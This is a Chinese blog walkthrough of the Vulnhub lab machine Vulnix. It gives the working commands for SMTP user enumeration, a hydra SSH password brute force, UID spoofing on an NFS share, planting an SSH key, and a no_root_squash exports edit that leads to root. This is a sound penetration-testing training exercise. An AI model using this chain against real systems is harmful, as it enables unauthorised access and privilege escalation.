Vulnhub靶场篇:Vulnix

最新推荐文章于 2024-05-11 21:54:12 发布
最新推荐文章于 2024-05-11 21:54:12 发布
阅读量2.3k 收藏 4
点赞数 3
分类专栏: 靶场渗透
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44740377/article/details/106125599
版权

VMWARE虚拟机下搭建环境:

攻击机kali IP:192.168.223.136  

靶   机IP:192.168.223.133

首先进行信息收集:

nmap -sS -sV -T4 -A -p- 192.168.223.133

可以看到此靶机开放了众多端口服务;SSH、FTP、Finger、POP3、NFS等

另外在端口25SMTP栏下我们看到VRFY(用于验证指定的用户/邮箱是否存在;由于安全原因,服务器常禁止此命令)没有被禁用

从SMTP入手;使用工具smtp-user-enum枚举用户(此处用VRFY方式);(也可以用metasploit辅助模块:smtp_enum)此工具在kali部分版本是自带的:

smtp-user-enum -M VRFY -U /usr/share/metasploit-framework/data/wordlists/unix_users.txt -t 192.168.223.133

这两个用户看起来较为重要;

我们使用hydra爆破user用户密码:

hydra -l user -P /usr/share/wordlists/rockyou.txt -t 4 ssh://192.168.223.133

使用账号密码user:letmein登录ssh并且查看其账户下用户相关属性(密码、UID、默认bash等等)

我们可以看到用户vulnix的UID为2008;

创建一个相同的UID账号,就可以登录进去:

 然后在lez文件夹下创建.ssh目录

此时新开一个终端进入我们kali机/tmp目录下生成一个密钥:

这边用ssh生成密匙后,回到临时用户lez下将密匙导入进去

 此时在kali机上就可以登录vulnix靶机了:

查看权限:

 发现我们可以以root身份编辑一个配置文件,此配置文件是NFS配置文件,我们在其中加上一句:

/root           *(no_root_squash,insecure,rw)

再物理重启靶机vulnix(物理重启.....放在实战就很僵硬),让NFS读取这个配置文件之后就可以看到root目录共享出来:

 把原本的挂载目录取消掉并且重新挂载新的目录:

umount /tmp/lez
mount -t nfs 192.168.223.133:/root /tmp/lez -o vers=2

接下来我们生成私钥,用私钥连接靶机:

mv id_rsa.pub authorized_keys
cp id_rsa /opt/id_rsa
chmod 600 /opt/id_rsa
ssh -i /opt/id_rsa -l root 192.168.223.133

 连接成功;得到最高权限,至此提权成功:

本文写的可能有点晦涩跳跃,博主水平(菜),但祝读者有好收获

夜车星繁
关注
  • 3
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
Vulnhub-靶机-HackLAB: Vulnix
qq_43264813的博客
03-05 1073
Vulnhub—靶机—HackLAB: Vulnix 本篇文章仅用于技术交流学习和研究的目的,严禁使用文章中的技术用于非法目的和破坏,否则造成一切后果与发表本文章的作者无关 地址:https://www.vulnhub.com/entry/hacklab-vulnix,48/ 文章目录Vulnhub—靶机—HackLAB: Vulnix一、信息收集二、漏洞利用三、Flag 一、信息收集 【步骤一】使用nmap确定目标靶机地址并对目标靶机进行全端口扫描: 【命令】nmap -n -sV -p- 192.168
Android官方建议关于Android APP UI界面设计的一些参考原则
一个IT人的技术成长历程。创造未来的行为就发生在今天,没有明天的目标,今天的行动就是重复昨天的事情。
01-16 1357
下面是来自于Android官网给出了关于Android APP UI界面设计的一些参考原则,希望对广大ui设计师能带来帮助,尤其是在进行Andriod相关界面设计的时候。   一、清晰是UI界面第一位,也是最重要的目标。   只有清楚的知道你设计的UI界面是什么,明白为什么要用它,理解界面是如何帮助他们交互的,预测用它会发生什么。人们才可能高效的利用它。模糊和迷惑的UI界面使得用户连疑问的...
kali搭建Vulhub靶场
最新发布
MateSnake的博客
05-11 1344
kali搭建Vulhub靶场
Vulnhub靶机:HackLAB_Vulnix
qq_48904485的博客
03-23 894
运行环境:Virtualbox(攻击机)和VMware(靶机)攻击机:kali(192.168.56.101)靶机:HackLAB: Vulnix(192.168.56.110)目标:获取靶机root权限和flag靶机下载地址:https://www.vulnhub.com/entry/hacklab-vulnix,48/
OSCP-vulnhub:HACKLAB: VULNIX靶机实战
cjstang的博客
07-06 407
本期是OSCP练习中的一个靶场,此靶场涉及到VRFY、hydra、showmount、rsa密钥登录(坑有点大)
【甄选靶场Vulnhub百个项目渗透——项目二十一HACKLAB_VULNIX(NFS挂载,ssh毒化)
人间体佐菲的博客
09-22 545
Vulnhub百个项目渗透——项目二十一:HACKLAB_VULNIX(NFS挂载,ssh毒化)网络安全,信息安全,渗透测试
VulnHub靶场MONEYBOX:1
01-05
VulnHub是一个提供各种漏洞环境的靶场平台,供安全爱好者学习渗透测试使用。MONEYBOX:1是VulnHub上的一个靶场环境,提供了虚拟机镜像,可以在本地安装并尝试完成渗透测试任务。这个靶场类似于一个游戏,需要逐步完成...
XXE漏洞详解【内含vulnhub靶场XXE Lab:1详解】
07-30
【想要搭建vulnhub靶场可关注博主,然后私聊我哦】 同时内含vulnhub中xxe lab:1靶场的过关记录 渗透思路: 由于网站信息什么都没有给出,首先判断靶场搭建的ip【实在判断不出来可以nmap扫一下,找到开放80端口的ip...
vulnhub靶场库中 DC:1
07-06
1. **Vulnhub靶场库与DC:1介绍** Vulnhub是一个在线资源库,提供了一系列虚拟机镜像,这些镜像设计为安全学习和实践平台,尤其是对于网络安全初学者。DC:1是Vulnhub靶场库中的一个特定靶机,它旨在帮助用户学习和...
Vulnhub靶场题解
08-24
介绍靶场的习题解答技巧,由红日团队精心编制,红日团队凭借多年经验于本文档
Vulnhub靶场题解.html
08-12
Vulnhub靶场题解.,适合渗透测试人员学习交流
Vulnix.7z靶机
04-25
一个vulnhub上的靶机,因为网络原因,下载的特别慢,我下载好,上传上来,供大家学习。如果大家有更好的靶机,请私我。
vulnix, 用于 nix/nixos的漏洞( 书钉) 扫描器.zip
09-19
vulnix, 用于 nix/nixos的漏洞( 书钉) 扫描器 Nix(OS) 漏洞扫描器这是一个实用程序,用于验证从实现路径可以访问的任何软件包,并可以能受到列表中的漏洞影响。它实现了一个CLI实用程序来检查当前状态和Sensu的监控集成。示例输出:Found 5 advisor
渗透测试攻防练习实验室 (资源分享,国外在线教程)
热门推荐
关注互联网安全的小虾米一枚
07-26 2万+
Vulnerable Web Applications Vulnerable Web Applications BadStore http://www.badstore.net/ BodgeIt Store http://code.google.com/p/bodgeit/ Butterfly Security Project ht
【Orasi靶机】
qq_40646572的博客
09-29 1820
orasi靶机挑战
【甄选靶场Vulnhub百个项目渗透——项目四十八:HACKNOS:OS-BYTESEC(压缩包爆破,无线爆破,环境变量挟持提权)
人间体佐菲的博客
10-22 566
【甄选靶场Vulnhub百个项目渗透——项目四十八:HACKNOS:OS-BYTESEC(压缩包爆破,无线爆破,环境变量挟持提权)
vulnhub靶场{GoldenEye-v1靶场实战}
AerYinan的博客
02-10 3366
vulnhub靶场{GoldenEye-v1靶场实战}
[渗透测试学习靶机07] vulnhub靶场 Prime 2
weixin_47112073的博客
10-27 1600
Prime 2这个靶机我看网上很少有人通关打靶练习,自己尝试做了一下,感觉整体难度:比较难,大家可以参考一下。
Android源码学习之六——ActivityManager框架解析
pl123133的专栏
07-06 967
ActivityManager在操作系统中有重要的作用,本文利用操作系统源码,逐步理清ActivityManager的框架,并从静态类结构图和动态序列图两个角度分别进行剖析,从而帮助开发人员加强对系统框架及进程通信机制的理解。 ActivityManager的作用 参照SDK的说明,可见ActivityManager的功能是与系统中所有运行着的Activity交互提供了接口,主要的接口围绕着运...
vulnhub靶场通关
09-09
vulnhub靶场是一个用于学习和测试网络安全技能的平台。通关vulnhub靶场需要进行一系列的渗透测试和漏洞利用操作。根据引用中提供的目录,以下是一个通关vulnhub靶场的大致步骤: 1. 环境搭建:下载靶场环境,并启动靶场环境。 2. 信息收集:通过探测靶机真实IP和开放的端口及服务进行信息收集。 3. 访问web站点:访问web站点并进行网站的扫描和漏洞探测。 4. 利用漏洞:使用Metasploit框架(MSF)进行漏洞利用。 - 使用MSF命令进行简单命令介绍和搜索Drupal 7的漏洞。 - 在MSF控制台中搜索drupal模块,并选择合适的模块进行测试。 - 设置靶机IP并运行相应的漏洞利用模块。 - 获取反弹shell或执行命令,并查找flag文件。 5. 登录站点:使用获取到的凭证登录站点并进一步探索和查找flag文件。 请注意,以上步骤仅提供了通关vulnhub靶场的大致思路,具体操作和漏洞利用可能因不同的靶场环境而有所不同。因此,确保在进行任何渗透测试操作之前,遵守法律和道德准则,并获得合法的授权。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值